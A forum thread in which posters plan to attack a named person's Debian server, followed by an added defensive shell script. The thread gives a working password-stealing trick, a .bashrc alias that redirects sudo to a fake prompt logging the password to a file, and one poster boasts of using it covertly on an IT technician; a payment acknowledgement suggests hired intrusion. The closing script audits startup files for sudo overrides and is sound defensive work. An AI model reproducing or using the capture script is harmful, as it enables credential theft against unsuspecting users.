What's to stop the hacker from spoofing the DNS record for tormail, SR, etc. and sending you to another server?
This is exactly what I was going to do if he gave us (or I managed to get) access to his server. He's using Linux so this doesn't apply, but some commonly installed Windows applications check for updates without forcing the use of https. It isn't too hard to trick the software into running your own "update", which would give you pretty much unrestricted access to do whatever you like on the victim's machine.
I've done things like that in the past, but as you say he's using Linux (Debian, so nmap says), so its package manager will check the signature of all packages.
Here's something else which I was intending to do:
If he's using bash, then create an alias within .bash_rc, and link sudo calls to a simple password capturing script.
e.g.
within .bash_rc:
alias sudo="passwordCapture.sh"
Now any time sudo is called (e.g. sudo apt-get update), the alias invokes the following 'fake sudo' script, which logs the password to a file, tells the user it is wrong, and calls the legitimate sudo program with the arguments originally passed.
#!/bin/bash
stty -echo
read -p "[sudo] password for $(whoami): " passw; echo
stty echo
echo $passw >> password.txt
echo "Sorry, try again."
echo "sudo $*" | sh
I did this many years ago to my old IT technician, but made the script more fancy by deleting any references once it had completed: he was none the wiser.
--
Thanks joe23, got your transfer.
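The post above describes shadowing sudo with an alias in the user's shell startup file. The defensive counterpart is to audit those files for any redefinition of sudo and to confirm that the running shell still resolves sudo to the real binary. The script below is an added example written for this page, not code from the thread; the function names, the sample rc file and the alias line it contains are constructed for illustration.

```shell
#!/bin/sh
# Added defensive check (not from the thread): look for aliases or shell
# functions that shadow sudo in per-user startup files, and check what the
# live shell resolves "sudo" to.

# Print any line in the given file that defines sudo as an alias or a
# function, with its line number. Exit status 0 if something was found,
# 1 if the file is clean.
find_sudo_overrides() {
    grep -nE '^[[:space:]]*(alias[[:space:]]+sudo=|(function[[:space:]]+)?sudo[[:space:]]*\(\))' "$1"
}

# Exit status 0 if the current shell resolves sudo to a filesystem path
# (e.g. "sudo is /usr/bin/sudo"), 1 if it is an alias, a function, or
# not found. Meant to be run from the interactive shell being checked.
check_live_sudo() {
    case "$(type sudo 2>/dev/null)" in
        "sudo is /"*) return 0 ;;
        *) return 1 ;;
    esac
}

# Walk the usual per-user startup files plus any extra paths given as
# arguments, and warn about each one that redefines sudo.
audit_rc_files() {
    rc=0
    for f in "$HOME/.bashrc" "$HOME/.bash_profile" "$HOME/.profile" "$HOME/.bash_aliases" "$@"; do
        [ -f "$f" ] || continue
        if find_sudo_overrides "$f"; then
            echo "WARNING: sudo is redefined in $f" >&2
            rc=1
        fi
    done
    return $rc
}

# Constructed sample rc file (hypothetical content) so the check can be
# exercised offline; the alias line mirrors the one described in the thread.
SAMPLE_RC=$(mktemp)
cat > "$SAMPLE_RC" <<'EOF'
export EDITOR=vim
alias ll='ls -l'
alias sudo="passwordCapture.sh"
EOF

# Example run: audit the real startup files and the constructed sample.
audit_rc_files "$SAMPLE_RC" || echo "review the files flagged above" >&2
```

A hit from find_sudo_overrides is not proof of compromise on its own (some people alias sudo deliberately), but any definition that points at a script rather than the real binary deserves a look, and `type sudo` in the affected shell shows what would actually run. Running the audit from a fresh login shell, or with `bash --noprofile --norc`, avoids being fooled by the very files being checked.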